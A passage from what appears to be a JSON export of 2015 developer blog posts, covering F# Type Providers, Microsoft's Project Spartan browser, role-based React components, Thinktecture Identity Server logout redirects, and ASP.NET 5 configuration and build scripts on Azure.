Microsoft.FSharp.Core.CompilerServices open Microsoft.FSharp.Quotations [<TypeProvider>] type StringTypeProvider(config: TypeProviderConfig) as this = inherit TypeProviderForNamespaces() [<assembly:TypeProviderAssembly>] do() Building the basicsThere’s a few basic things that you’ll need to do for every Type Provider that you create, you need to:\nCreate a namespace Create a type Add members to the type Add type to the namespace Add type to the assembly For the namespace you can generate anything you want, you can get the namespace from the current assembly (ie - your project) but adding types to someone else’s namespace is a bad idea, you might generate a type that clashes with something they too have created. Because of this you’re better off creating your own namespace. Also we’re going to need a reference to the assembly, let’s set that up:\n1 2 3 4 5 6 [<TypeProvider>] type StringTypeProvider(config: TypeProviderConfig) as this = inherit TypeProviderForNamespaces() let namespace = "Samples.StringTypeProvider" let thisAssembly = Assembly.GetExecutingAssembly() Now we’ll create our type to “export” from the Type Provider and export it:\n1 2 3 4 5 6 7 8 9 10 [<TypeProvider>] type StringTypeProvider(config: TypeProviderConfig) as this = inherit TypeProviderForNamespaces() let namespace = "Samples.StringTypeProvider" let thisAssembly = Assembly.GetExecutingAssembly() let t = ProvidedTypeDefinition(thisAssembly, namespaceName, "StringTyped", Some typeof<obj>) do this.AddNamespace(namespace, [t]) The let t = ... line creates us a new type that will be exported by the namespace. I’ve named it StringTyped so when using the Type Provider we’d access it via Samples.StringTypeProvider.StringTyped. When creating a new Type Definition you need to specify the base type to inherit from, it’s an Option type of type and can have anything as the base type. Generally speaking you’ll want to use obj as the base type but really you could use anything you wanted as your base type. 
If you really want to generate a slimmed down type you can set the HideObjectMethods property to false to suppress the intellisense for members exposed off System.Object, members such as ToString.\nLastly we add the type and namespace to the type provider using the AddNamespace method.\nPassing arguments to our Type ProviderThe way I want to use my Type Provider is like so:\n1 type helloWorld = Samples.StringTypeProvider.StringTyped< @"Hello World!" > For this to happen I need to specify that it will receive an argument. This is done by defining a static parameter:\n1 let staticParams = [ProvidedStaticParameter("value", typeof<string>)] I’m creating it as an array as I’ll need an array later, but essentially what I’m doing is saying that there will be a static parameter provided, it will be a string and I want you to call it value.\nNext up I need to handle what will happen when the Type Provider is invoked, I do this by defining static parameters on my Type Definition created above:\n1 2 3 4 do t.DefineStaticParameters( parameters = staticParams, instantiationFunction = ... ) There’s two things we’re providing here, the list of static parameters and an instantiation function. This instantiation function is what will be called by the Type Provider when the compiler comes across it, so it’s where we want to generate our logic for actually building something up and it takes an F# function that receives the name of the type (ie - StringTyped) and then and obj[] of the parameters which were provided. This array will match to the parameters we define with the parameters property so in our case we expect a single parameter that is a string. I’m going to use a match to validate this:\n1 2 3 4 5 6 7 8 9 10 do t.DefineStaticParameters( parameters = staticParams, instantiationFunction = (fun typeName paramValues -> match paramValues with | [| :? string as value |] -> ... | _ -> failwith "That wasn't supported!" ) ) So our primary match condition checks:\nIs this an array It has a single value That value can be cast as a string, which I’ll do and call value (this is important later on) Finally from this fun we need to return a Type Definition so let’s create that:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 do t.DefineStaticParameters( parameters = staticParams, instantiationFunction = (fun typeName paramValues -> match paramValues with | [| :? string as value |] -> let ty = ProvidedTypeDefinition( thisAssembly, namespaceName, typeName, Some typeof<obj> ) ty | _ -> failwith "That wasn't supported!" ) ) This is basically the same as we used originally with the only difference being that I’m using the name passed in rather than a hard-coded name.\nAdding constructorsNow that I have created my Type to be instantiated it’s time that I make it do something useful. To do that I’m going to create a constructor to it.\nThanks to our base class creating a constructor:\n1 2 3 4 let ctor = ProvidedConstructor( parameters = [], InvokeCode = fun args -> <@@ value :> obj @@> ) Well that was easy wasn’t it! I use the ProvidedConstructor method, define any parameters I want and finally give it the code that I want to run. The code is in the form of an F# Quotation which is that the <@@ @@> syntax is all about and I am saying that the available value (captured earlier) will be downcast to obj.\nIf you’re curious this code, when used, compiles down to the following C#:\n1 var something = (object)"Hello World"; Where something was the name of our instance and Hello World the value we passed to it. 
Pretty cool huh!\nGenerating intellisenseWe’re generating a type on the fly here so it stands to reason that documentation is going to be sparse. If your users are using Visual Studio it might be nice to give them some intellisense help to guide them onto your usage. Conveniently the API we’re working with to build our Type Provider gives us such a facility:\n1 ctor.AddXmlDoc "Initialise the awesomes" And there you go, intellisense done! Now there are actually two others ways to generate intellisense, it can either be dalyed\n1 ctor.AddXmlDocDelayed (fun () -> "Initializes a the awesomes") Meaning that until the intellisense is requested the function won’t be evaluated. This can be useful if you’re generating your documentation based off some intensive process. Remember that a Type Provider is evaluated at compile time so if it’s something expensive that you don’t have to do consider delaying it.\nYour other option is to use a computed doc:\n1 ctor.AddXmlDocComputed (fun () -> "Initializes a the awesomes") While this looks similar to delayed the difference is that delayed docs are generated then cached while computed docs are generated evey single time.\nOnce you’ve setup your documentation the final step is to add your constructor to the type:\n1 ty.AddMember ctor PropertiesNow that we have a constructor let’s add some properties to the type you’re going to get.\n1 2 3 4 5 6 let lengthProp = ProvidedProperty( "Length", typeof<int>, GetterCode = fun args -> <@@ value.Length @@> ) ty.AddMember lengthProp There we go, that’s pretty easy isn’t it! We have a few things that we’re doing like giving the property a name, Length, giving it a type, int and then we can provide getters and setters using F# Quotations again. These functions can be as simple or as complex as you like. I’m doing something simple here but you could say, generate a setter that does validation by adding a more complex body.\nI could even do something like bulk generate properties:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 let charProps = value |> Seq.map(fun c -> let p = ProvidedProperty( c.ToString(), typeof<char>, GetterCode = fun args -> <@@ c @@> ) let doc = sprintf "The char %s" (c.ToString()) p.AddXmlDoc doc p ) |> Seq.toList ty.AddMembersDelayed (fun () -> charProps) You’ll see here that you can add properties (well, any members) in a delayed fashion, again useful when you’re generating them from a data source, like a SQL schema or REST end point.\nThere’s a bunch of other properties on your properties that you can set, if you’re after a static then set the IsStatic to true (default is false). Check out what you get from intellisense (or is defined in the fsi) for the full details of what you can do to a property.\nMethodsWhen generating a method it’s similar to all the other members but with the difference, we get to create a method body. Here’s a method we could make:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 let reverser = ProvidedMethod( methodName = "Reverse", parameters = [], returnType = typeof<string>, InvokeCode = (fun args -> <@@ value |> Seq.map (fun x -> x.ToString()) |> Seq.toList |> List.rev |> List.reduce (fun acc el -> acc + el) @@>)) ty.AddMember reverser This takes our string and reverses it through a few pipeline steps. You can though make something as complex as you want, doing whatever you need it to do.\nReady for consumptionThere we have it, our Type Provider is ready for us to use. 
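To give a feel for the end result, consuming it looks roughly like this once the compiled provider assembly is referenced from another project or script (the comments show what you’d expect given the members we defined above):
type helloWorld = Samples.StringTypeProvider.StringTyped< @"Hello World!" >

let hw = helloWorld()

printfn "%d" hw.Length      // 12
printfn "%s" (hw.Reverse()) // "!dlroW olleH"
printfn "%c" hw.H           // 'H', one of the per-character properties we generated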
If you want to see the completed Type Provider it can be found here.\nNow it’s worth talking about some gotchas and things to be mindful of.\nMember Names Remember that F#’s member naming is a lot more relaxed than C#, you can use a lot more characters provided you escape them. That means the following code is valid:\n1 2 3 4 5 type snowman = Samples.StringTypeProvider.StringTyped< @"☃" > let doYouWantToBuildASnowman = snowman() doYouWantToBuildASnowman.``☃`` Yep, that’s a snowman property. Isn’t unicode fun!\nVisual Studio locks the assembly This is something that hits me all the time when I’m mucking with Type Providers, when you reference a Type Provider, either from a project or within the F# interactive. The problem here is that when you write some code, compile and then use it you’ve got your assembly locked. Now you can’t change it until you restart Visual Studio. Yay…\nYou’re impacting compile time Remember that a Type Provider is something that is evaluated at compile time by the F# compiler. The more complex the processing you do with your Type Provider the greater an impact you have on compile time. If you’re worried about doing something too intense don’t be afraid to leverage the delayed features, be it for documentation or member creation.\nConclusionThere you have it folks, a walkthrough on how to create an F# Type Provider. Remember that there is a video from F# Sydney that also covers this (and some other rambling on my part) and you can find the full code as a gist.\n", "id": "2015-02-06-writing-a-fsharp-type-provider" }, { "title": "Microsoft's Project Spartan and speculating Internet Explorer's future", "url": "https://www.aaron-powell.com/posts/2015-01-25-project-spartan-and-internet-explorer/", "date": "Sun, 25 Jan 2015 00:00:00 +0000", "tags": [ "internet-explorer" ], "description": "On the 21st of January Microsoft showed off their new browser code named Project Spartan, so let's have a look at what it's about.", "content": "Before we dive in, I don’t work for Microsoft but I am an Internet Explorer MVP and a member of the IE userAgent’s, so what I’m discussing here is based on what is publicly available and my own speculations.\nOn the 21st January Microsoft had an event to show off what is coming next in their Windows 10 platform, the future of Windows and importantly for us Web Developers talked about Project Spartan which had previously been speculated about.\nIf you missed what’s what with Spartan go read the IE team’s blog post.\nWhat is Spartan?The first logical question is what’s Spartan all about? Basically what it is is Microsoft has taken their rendering engine (Trident) and JavaScript engine (Chakra) and produced a brand new browser chrome (the UI) for it (for the most part, there’s a few more things I’ll touch on shortly). Now the name Spartan is a code name so what it finally get’s named is unclear, but what is clear is that it’s unlikely to use the Internet Explorer brand. This is really quite interesting as I’ve previously suggested the Internet Explorer brand can’t survive.\nAlso considering a new chrome is really exciting as the IE chrome that we’re familiar with still has a lot of similarity with the first versions of IE. 
Starting this from scratch rather than continuing with the existing chrome gives a chance to rethink how users use the browser, which we saw with things like the lack of toolbars and Cortana integration.\nA browser by any other nameTrident and Chakra are very capable engines, if you look at some of the new features in the Windows 10 Preview as well as looking at status.modern.ie for whats shipped, in preview or in development there’s a lot the latest releases contain.\nBut what’s interesting about Trident, or more specifically, how Trident ships, can be seen in the animation about half-way down the IE team’s blog post. The core is mshtml.dll (which resides in Windows\\System32) and on my Windows 8.1 machine contains the ability to run as IE11, IE10, IE9, IE8, IE7 and IE5.5. That’s 6 different browsers IE can run at, or at least attempt to emulate. I’ve been a developer for a while and I know I don’t like dealing with code written the previous year (especially if it’s my code) let alone dealing with code that is at least 14 years old. Change something here and have side effects over there and the more legacy pathways you need to support the harder it gets.\nBut mshtml.dll is used for a lot of different things, like Outlook desktop. Kind of don’t want to make big changes that impact that! And of course there’s all those shitty enterprise applications that think Windows XP is the pinical of web development…\nWhat’s interesting about Spartan is that while mshtml is still there is isn’t responsible for rendering websites, it’s only responsible for intranet sites. Instead for public websites a new assembly, edgehtml.dll contains just the latest work from the IE teams without the overhead of multiple versions of flexbox, old vendor prefixes or a box model that was fixed years ago.\nAlso because the changes aren’t in the (now) old rendering engine they can (in theory at least) be revised and released faster, hopefully getting us to the point where version numbers are no longer important, you build for the spec and only the spec.\nThe future of IE?Well then, we’ve got a new browser chrome and a forked browser engine, what does that mean for IE? IE will be around in Windows 10 from what we know but Spartan seems to be the default browser with IE being just another choice of browser on the platform. Whether IE continues beyond Windows 10 is something that I’m going to be watching with interest. After all there’s still people out there making extensions for IE, ActiveX controls, etc, all of which are tied to the current chrome and mshtml.\nNow let’s move on to what they haven’t talked about and start speculating.\nPluginsNothing was talked about plugins, during the demo they showed off things like inking support (which looks really useful), but not about writing 3rd-party extensions. A lot of people don’t realise that creating extensions for IE is possible, it’s just not particularly nice. It’s been speculated that Chrome extensions will be supported in Spartan and I really hope that’s the case, or at least they are highly interoperable, so we don’t have a case of reinventing the wheel and allow us web developers to have a common platform for browser extensions.\nIt’ll be v1While the rendering engine will be the latest from Trident, the UI is being done from sratch. Remember Firefox v1? Chrome v1? These weren’t what they are today. To push out a new browser chrome, handle multi-loading of the rendering engines adding new features all of that stuff, there’s only a finite amount of time. 
We can expect things to be v1. That’s not to say that I expect it to be sub-standard or anything but I know I’ll be submitting feedback to help direct the browsing experience. After all it’s not every day you get a brand new browser chrome is it?\nWe already know F12’s Dev Tools will be there which is all I really want!\nConclusionI’m really looking forward to this coming and trying Spartan out. We know it’s not coming just yet in the Window’s 10 builds, but really the chrome isn’t what I’m interested in, it’s the browser engine. That’s already available in the IE builds on Windows 10 and remoteIE.\nThe future of the web looks good.\n", "id": "2015-01-25-project-spartan-and-internet-explorer" }, { "title": "The danger of the 'Just Use WebKit' mindset", "url": "https://www.aaron-powell.com/posts/2015-01-26-the-danger-of-the-just-use-webkit-mindset/", "date": "Sun, 25 Jan 2015 00:00:00 +0000", "tags": [ "web", "browsers", "internet-explorer" ], "description": "Just use WebKit seems to be a common belief in web developers, but there's a danger involved in that mindset.", "content": "\nSigh\nAs a web developer working in the Microsoft space I hear this statement a lot. Go check out the IE UserVoice and you’ll find this.\nI want to talk about why this mindset of “just use WebKit” is a dangerous one.\nChrome isn’t WebKitWhen a lot of people say this to me most of the time they are actually saying that they’d prefer IE to be Chrome. It’s somewhat strange that so many web developers seem to have forgotten that Chromium forked WebKit and made Blink nearly 2 years ago. Blink just still uses the -webkit vendor prefix rather than creating their own because it turns out that web developers are pretty lazy with vendor prefixes, so much so Microsoft supports -webkit.\nChrome’s not WebKit, who is? Right, if Chrome isn’t WebKit then when you’re using WebKit you must be using Safari right? Well… close but not quite. Paul Irish has a good write up about the breakdown of WebKit. It’s a bit old, pre-Chromium’s fork, but a lot of it holds true still, most browsers still swap out parts and let’s not forget that Safari’s work is done in private before being pushed downstream to the OSS project, or at least that’s the expectation.\nEditor note: Just to clarify Safari isn’t WebKit, Safari is just a port of WebKit (see the link above). Apple (who produces Safari) is one of the primary contributors to WebKit, but that’s not to say that everything in Safari is in WebKit, Safari uses a different JavaScript engine for example, nor is everything in WebKit in Safari. What I meant be ‘Safari’s work is done in private’ is about Safair the browser, when features are included, etc, not that WebKit is developed in private by Apple.\nAlright, maybe I’m getting hung up on WebKit specifically, let’s get back to the common point “be Chrome”.\nThe browser monocultureAs a web developer this is one of the most scary concepts, having a browser monoculture. I’ve been working in the web industry for 10 years, so I came in on the tail of the browser wars, just as IE6 had become the winner. 
I remember developing for Netscape but it was already becoming a rarity, we had entered an era of monoculture and the only browser was IE6.\nIn this era the web stagnated, there was no innovation going on, there was no incentive for innovation because after all there was no competition.\nI don’t want to see this happening again.\nThe belief that one browser engine is superior to another is a very subjective belief, for example check out the current ES6 compatibility table (sorted by number of features):\nCurrently IE vNext (which will be the core of Project Spartan) and Firefox 37 (currently nightly) are on par with Chrome 41 lacking a bit (although Chrome 42 which is the latest Canary has 52% coverage). Dropping Chakra for v8 would be a bit of a backwards step in terms of ES6 support wouldn’t it?\nSimilarly Can I Use can produce a good comparison between the browsers on a broader feature set.\nWhat we can see is that different browsers implement different features at different rates, and this leads to innovation. Browser A implements something, gets feedback on the implementation, other browsers implement it, problems are found, fixed, redesigned, rinse and repeat.\nIn fact this is how standards happen.\nIn a monoculture an implementation is done and that’s all there is. We still see this happening in the web platform today, touch events are a great example. Now imagine that lack of design with everything driving the web. We’d end up with people doing crazy things like the <blink> element, VBScript instead of JavaScript or plenty of other whacky things.\nConclusionThe trend of web developers thinking that there should be only a single browser engine is a dangerous one, we saw what happened after the last browser war.\nCompetition is an important part of any industry and the web is no different. Trident as it was in 2007 is very different to the Trident of 2014 and we know that Spartan brings changes to put the legacy in places that are even harder to get to, and this is thanks to competition.\nSo don’t be narrow minded, understand how the web platform works and why multiple players are the only way we’ll continue to evolve the web in the way we want it to.\n", "id": "2015-01-26-the-danger-of-the-just-use-webkit-mindset" }, { "title": "Evolving authentication on React components", "url": "https://www.aaron-powell.com/posts/2015-01-17-evolving-authentication-on-react-components/", "date": "Sat, 17 Jan 2015 00:00:00 +0000", "tags": [ "react", "security" ], "description": "Taking what we learnt in the last post and evolving the approach.", "content": "In my last post I talked about how you can do Authentication on React components using mixins.\nUsing a mixin to add role-based security to any component we create is really handy but it does have one real problem, you have to inherit that mixin on every component you want to have it on. It works well when you want to do something like hide links or buttons, but it starts to fall down when you want to hide sections of components, maybe a row in a table is only there for certain roles, or a section of a menu isn’t visible for everyone.\nIn this post I wan to have a look at an alternate approach to adding role-based security only in a more generic fashion.\nRequireRoles ComponentAs I said in the post we used a mixin that we added to components, this time I’m going to create a dedicated component which I’ll call RequireRoles. 
My goal is that you would end up with a usage like this:\n<RequireRoles profile={...} roles={...}> <div className="admin-widget"> ... </div> </RequireRoles> We’ll start by creating our component:\nvar RequireRoles = React.createClass({ permitted: function (requiredRoles) { return this.props.profile.roles .some(role => requiredRoles.some(rr => rr === role) ); }, render: function () { if (!this.props.profile || !this.props.profile.roles) { return null; } if (!this.permitted(this.props.roles))) { return null; } //TODO: Render something on success } }); I’ve grabbed the code that I had in the last sample so if you’ve not read it check it out to get what it’s doing. Alternatively I could have used the mixin that we defined but I wanted to keep this sample stand-alone.\nThe only new thing we need to do here is deal with rendering when the roles are valid. For that we need to work with the children property.\nvar RequireRoles = React.createClass({ permitted: function (requiredRoles) { return this.props.profile.roles .some(role => requiredRoles.some(rr => rr === role) ); }, render: function () { if (!this.props.profile || !this.props.profile.roles) { return null; } if (!this.permitted(this.props.roles))) { return null; } return this.props.children; } }); Well that was simple wasn’t it, all we return is this.props.children. It’s worth nothing though that if you look back at my original code snippet:\n<RequireRoles profile={...} roles={...}> <div className="admin-widget"> ... </div> </RequireRoles> The children of the component is the <div> and there is only a single child. This might be something that I’m doing wrong but I’ve found that you can only have a single child, if there are multiple children then nothing rendered, but this is a pretty easy requirement to meet, wrapping everything in a <div> and it’s all good.\nBuilding our <App>Now that we’ve got our component created how does our <App /> look?\nvar App = React.createClass({ getInitialState: function () { return { profile: {} }; }, componentDidMount: function () { profileLoader().then(profile => this.setState({ profile: profile })); }, render: function () { return React.createElement('div', null, React.createElement(RequireRoles, { roles: ['admin'], profile: this.state.profile }, React.createElement('div', null, React.createElement('h1', null, 'Admin stuff here'), React.createElement('h2', null, 'Something else for the admin') ) ) ); } }); Yeah I didn’t use JSX here to show how it’d look “compiled”.\nConclusionThere we have it, that’s how we can build a reusable component for wrapping other DOM elements/components in role validation. 
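In JSX that single-wrapper requirement ends up looking like this (it’s the same markup you’ll see ‘compiled’ in the <App /> below):
<RequireRoles profile={this.state.profile} roles={['admin']}>
  <div>
    <h1>Admin stuff here</h1>
    <h2>Something else for the admin</h2>
  </div>
</RequireRoles>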
By creating a component that returns this.props.children rather than something crafted, you’ve created a wrapper component.\nIf you combine this with the mixin from the last post then you’ll have covered pretty much every approach to doing role-based validation on components in React applications.\nAgain there is a working demo here, on jsbin.\n", "id": "2015-01-17-evolving-authentication-on-react-components" }, { "title": "Authentication on React components", "url": "https://www.aaron-powell.com/posts/2015-01-15-authentication-on-react-components/", "date": "Fri, 16 Jan 2015 00:00:00 +0000", "tags": [ "react", "security" ], "description": "Here's an approach on how to create React components that have role-based security on them.", "content": "When building a Web Application, or any application at all, it’s often required that you hide/show functionality depending on the permissions which the logged-in user has associated with them. The Web Application I’m currently working on has this requirement: only users who are in the administrator group will be able to access the administration section of the website.\nIn this application I’m using Facebook’s React JavaScript framework and in this post I want to look at the approach we’re using to do role-based permissions on the React components that we are creating.\nIt’s worth pointing out that doing this is only adding client-side security for your components, not server-side security. In an application you’ll want to make sure that you’re also checking the user’s permissions on the server too, to ensure that users can’t type in a URL and get to pages/data they shouldn’t. I won’t be covering server-side security here as that depends on your server platform and your security model.\nMixins\nThe easiest approach to this I have found is to leverage the mixin feature of React. A mixin is kind of like a base class: you “inherit” from zero or more mixins and React will extend your component with the members defined in the mixin.\nFor this I’m going to create a mixin named RoleRequiredMixin:\nvar RoleRequiredMixin = { }; If you haven’t used mixins before then you’ll notice they are just a standard JavaScript object that you add members to. I’m going to create a member called permitted which takes some roles and checks them against the user.\nvar RoleRequiredMixin = { permitted: function (requiredRoles) { //TODO: Implement } }; Ok, now the question here is how to find out who the current user is so we can check against them.\nLoading profiles\nThere are plenty of different ways you can construct a profile for the user: it could be info rendered into the DOM during the page load, it could be loaded via an AJAX request, or any number of other approaches. How you construct it is not particularly important, what is important is getting it into your component. My recommendation is that you pass the profile to your component as a property rather than resolving it in the permitted method. The reason for this is that it gives me the ability to load it once and share it with multiple components, so I’m going to assume our parent component, aka the page, takes care of that for us and just read it from the props of our component:\nFinishing our permitted method\nvar RoleRequiredMixin = { permitted: function (requiredRoles) { return this.props.profile.roles .some(role => requiredRoles.some(rr => rr === role) ); } }; And there we go, our permitted method is now implemented.
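Before wiring it into a component, it can help to see that check in isolation. Here’s a quick standalone sketch of the same some-within-some logic with a made-up profile, just to show how it evaluates (this assumes an ES6-capable environment for the fat arrows):

// the same check outside of React, with made-up data
var profile = { roles: ['user', 'editor'] };

var permitted = function (profileRoles, requiredRoles) {
    return profileRoles.some(role =>
        requiredRoles.some(rr => rr === role)
    );
};

console.log(permitted(profile.roles, ['editor', 'admin'])); // true - 'editor' matches
console.log(permitted(profile.roles, ['admin']));           // false - no overlap

As soon as one of the user’s roles matches one of the required roles the whole thing returns true, otherwise it’s false.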
Inside permitted we’re:\nGetting the roles array from our profile\nPerforming a some to find any roles that…\nMatch any of the required roles\nYou’ll also notice that I’m using the ES6 fat arrow feature (which React understands and transpiles down) to make our some calls look more lambda-ish.\nUsing our mixin\nNow that our mixin is created let’s make use of it. I’ll start off with a simple component that’s available when the user has a role of user:\nvar UserComponent = React.createClass({ render: function () { return null; } }); Here’s the start of our component, let’s now add the mixin:\nvar UserComponent = React.createClass({ mixins: [RoleRequiredMixin], render: function () { return null; } }); Excellent, our component has been extended, time to start implementing the render method. I’m going to make an assumption that the profile might be asynchronously loaded, so the first thing I’ll do is check for a profile; if there’s none then we won’t render the component:\nvar UserComponent = React.createClass({ mixins: [RoleRequiredMixin], render: function () { if (!this.props.profile || !this.props.profile.roles) { return null; } return null; } }); When the checks for the profile existing and being well formed pass I can call our mixin method:\nvar UserComponent = React.createClass({ statics: { requiredRoles: ['user'] }, mixins: [RoleRequiredMixin], render: function () { if (!this.props.profile || !this.props.profile.roles) { return null; } if (!this.permitted(UserComponent.requiredRoles)) { return null; } return React.createElement("div", null, "This is a user component!"); } }); As you can see here, whenever a check fails we return null from the method. By doing this we are telling React that this component isn’t actually rendering anything. If it succeeds then we render out our component as normal.\nAnd that’s our UserComponent completed. For the list of required roles I’ve created a static on the component which is passed in. The reason I did this is so that if we have multiple instances of this component the role list is the same, reducing memory overhead.\nUsing our component\nWith our component created we can now go about using it.\nvar App = React.createClass({ render: function () { return React.createElement("div", null, React.createElement(UserComponent, { profile: this.state.profile }) ); } }); React.render(React.createElement(App, null), document.body); You’ll see that I’m passing the profile down as a property which comes from the state of our React app. Let’s go about getting the profile:\nvar App = React.createClass({ getInitialState: function () { return { profile: {} }; }, componentDidMount: function () { profileLoader().then(profile => this.setState({ profile: profile })); }, render: function () { return React.createElement("div", null, React.createElement(UserComponent, { profile: this.state.profile }) ); } }); For illustration purposes I’m loading the profile from an asynchronous method; this could be an AJAX call or any other way of loading the data.\nConclusion\nThere we have it, a very simple way we can use React’s mixin feature to create components that will only be rendered when a user has a required role.
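As for profileLoader, which I’ve treated as a black box, any function that returns a promise for the profile will do. A minimal sketch of one possible implementation (assuming native Promises or a polyfill, and a hypothetical /api/profile endpoint) might look like:

// a hypothetical loader - swap the URL for wherever your profile actually comes from
var profileLoader = function () {
    return new Promise(function (resolve, reject) {
        var xhr = new XMLHttpRequest();
        xhr.open('GET', '/api/profile');
        xhr.onload = function () {
            // expecting a response shaped like { roles: ['user', 'admin'] }
            resolve(JSON.parse(xhr.responseText));
        };
        xhr.onerror = reject;
        xhr.send();
    });
};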
We used the some array method to check whether the user has any of the required roles, but you could change that to an every if you wanted to make sure that users have all of the required roles.\nI’ve published a full example on jsbin which shows different components with different roles expected and a basic profile loader.\n", "id": "2015-01-15-authentication-on-react-components" }, { "title": "Authomatic redirection when logging out of a Thinktecture Identity Server", "url": "https://www.aaron-powell.com/posts/2015-01-11-auto-redirect-when-logging-out/", "date": "Sun, 11 Jan 2015 00:00:00 +0000", "tags": [ "thinktecture" ], "description": "When using the Thinktecture Identity Server you might want to do an automatic redirect upon logout, which doesn't happen OOTB, so here's how to do it.", "content": "I’ve been working with the Thinktecture Identity Server v3 recently on a project. If you haven’t come across Thinktecture Identity Server before, it’s an OpenID/OAuth2 server which you can run stand-alone or embed in your own application to then do OAuth2 login against any credential store. It’s generic enough that you can plug in whatever underlying store you want and it’s really powerful in what it gives you. If you’re wanting to have your own auth server I can’t recommend this highly enough.\nRecently on the project we added something that you kind of want from an authenticated site: the ability to log out. Unsurprisingly Identity Server gives you the ability to log out; you redirect the user to the appropriate end point, the authorisation server performs the logout and then you are presented with a screen that says “Thanks for logging out, click here to go back to your site”.\nThis is less than ideal for my scenario, I don’t want the double-step, I want people to be returned to where they came from (actually I return them to another page which clears the client state in our SPA, but really I just don’t want them to see a “Thanks for logging out” screen).\nCustomising the Login/Logout process\nWith this requirement in mind it was time to dig into the Thinktecture API and work out where that page comes from. What is interesting to note is that the whole login/logout process appears to be served without any on-disk files, but looking into the API I found that this is not entirely true: there are some on-disk files that get compiled as embedded resources and then served out by the DefaultViewService, which is a class that has a method for each step of the login and logout process. The implementation then reads the files from the embedded resources and sends the stream back (which is then passed to the response stream).\nThis is where we need to hook in to do our different logout process, and you can either implement the IViewService interface yourself or override the particular methods you need on the DefaultViewService. The latter is what I’ve chosen to do as I only want a different logout flow.\nEnforcing redirect\nThe one problem I noticed with the way this all works is that because I don’t want anything served, I just want to do a redirect, I have a bit of a problem: I only have a Stream which I can return from the method (and digging further you’ll find that the Stream is passed straight to the response, which has a ContentType of text/html), not an actual response.\nSo how do we enforce the redirect? Well it’s time to get back to basics and play with the Meta Refresh in HTML.
If you haven’t used the <meta http-equiv="refresh"> tag before it can be a nifty trick if you want to either reload a page after a period of time or redirect a browser after a time period. And that sounds exactly like what I want to do.\nGenerating the appropriate responseRight let’s recap:\nWe need to override the Logout method of the IViewService Generate a chunk of HTML with the appropriate meta tag And all that is pretty simple, in fact it’s less that 20 lines of code:\npublic override Task<Stream> LoggedOut(LoggedOutViewModel model) { var content = @"<!DOCTYPE html> <html> <head> <meta http-equiv='refresh' content='0;{0}'> </head> <body></body> </html>"; var formattedContent = string.Format(content, model.RedirectUrl); return Task.FromResult(formattedContent.ToStream()); } Note: the ToStream method is an extension method which you’ll find in the Thinktecture.IdentityServer.Core.Extensions namespace, but feel free to write your own string-to-Stream method if you must.\nTold you it was simple code. Because we want an immediate redirect I’ve set the meta-redirect to be 0 seconds, resulting in immediate redirection and really, that’s all that is important.\nConclusionWrapping up this post:\nThinktecture Identity Server is awesome. If you want your own Identity Server I’d use this over anything else There’s a great amount of abstraction built in, swapping parts is so easy Doing an immediate redirect is a matter over overriding one method, returning 7 lines of HTML ", "id": "2015-01-11-auto-redirect-when-logging-out" }, { "title": "Reading Azure config in ASPNet5", "url": "https://www.aaron-powell.com/posts/2015-01-03-reading-azure-config-in-aspnet5/", "date": "Sat, 03 Jan 2015 00:00:00 +0000", "tags": [ "aspnet", "aspnet5" ], "description": "There's a new config system in ASPNet5, so when you use an Azure Website how can you read the values stored in the Azure config?", "content": "In my rush to make the awesome website What the Commit? live I completely forgot that I’d committed the GitHub private key to the git repository. Whoops!\nSorry I have since reset the keys so no, you can’t use them :P.\nIn ASPNet5 there’s no dependency on IIS which in turn means there’s no Web.config. This poses an interesting question of where you get your configuration values from and how would you do different values per environment (aka, config transforms). If you’re not familiar with the the new configuration system check out this blog.\nOn Azure WebsitesWhen using Azure Websites if you go to the Configure section towards the bottom there is app settings. Here you can define settings that will be loaded up by your application when it starts.\nSince we’ve got a completely new config pipeline how would we access them?\nI decided to poke around in the loaded configs, which turns out to be a bit harder as it’s so abstract (I created some sample code for those interested) and what I learnt was they are available as Environment Variables.\nLoading Environment VariablesIf you want to use Environment Variables as a config source you need to make sure you load it, here’s what I did for my sample:\npublic class Startup { public Startup(IHostingEnvironment env) { // Setup configuration sources. Configuration = new Configuration() .AddJsonFile("config.json") .AddEnvironmentVariables(); } Here I’m defining two configuration sources. First is a JSON file which contains configuration options I’m unlikely to change per environment, maybe the number of results per page. 
Secondly I add the Environment Variables source, meaning that anything I’ve defined in there trumps what I have defined in the JSON file.\nConclusionIf you’re using Azure Websites and want to have different settings or load in sensitive settings then they are available as Environment Variables, which can be accessed in an ASPNet5 app using the appropriate configuration source.\n", "id": "2015-01-03-reading-azure-config-in-aspnet5" }, { "title": "Running grunt tasks when deploying ASPNet5 apps to Azure", "url": "https://www.aaron-powell.com/posts/2015-01-02-running-grunt-tasks-when-deploying-aspnet5-apps/", "date": "Fri, 02 Jan 2015 00:00:00 +0000", "tags": [ "aspnet", "aspnet5", "grunt", "gulp" ], "description": "How to run grunt (or gulp) tasks when deploying ASPNet5 applications to Azure Websites.", "content": "After MVP Summit this year the ASPNet team held a hack-day where we were encouraged to build something using ASPNet5 to help test out the platform. During that time I decided to build a website for when you can’t think up your own commit message, instead it’ll grab the last 50 commit messages from a GitHub using GitHub search called What the Commit.\nI finally decided to throw it up GitHub and deploy it to Azure. Since the app is a SPA I went down the route of using grunt and bower to manage the client side dependencies and build process (which is the recommended approach in ASPNet5 too).\nNaturally I don’t want to add all my node modules or bower components to the git repo, instead I’ll want to restore them before build, just like I do with my NuGet dependencies.\nWell how do you go about doing that?\nProject scriptsPart of the project.json is a scripts section which allows you to run arbitrary commands at various stages of the pipeline.\nFor restoring any packages from npm I find the most logical event to hook into is postrestore, which I believe runs when the NuGet packages have been restored, so you’re done with the .NET restore, now to the Node restore.\nNext you’ll need to run your grunt task(s) (or gulp if you’re using that) and to do that I went with the postbuild event as I’m running my client-side build process (which for me is doing little more than restoring some bower packages).\nAll completed my scripts property looks like this:\n"scripts": { "postrestore": [ "npm install" ], "postbuild": [ "grunt default" ] } First I run npm install to get the Node dependencies down, then I run grunt default which will restore my bower components, but could also do things like transpile, combine, minify, etc your scripts.\nWatch your path lengthsAnyone who has done Node development on Windows will have hit the fun “path exceeds 260 characters” and you can hit this on Azure too with ASPNet5 applications because you’re using Node for client builds. The reason for this is that a deployment happens into a temp folder before copying it over to the hosting folder. 
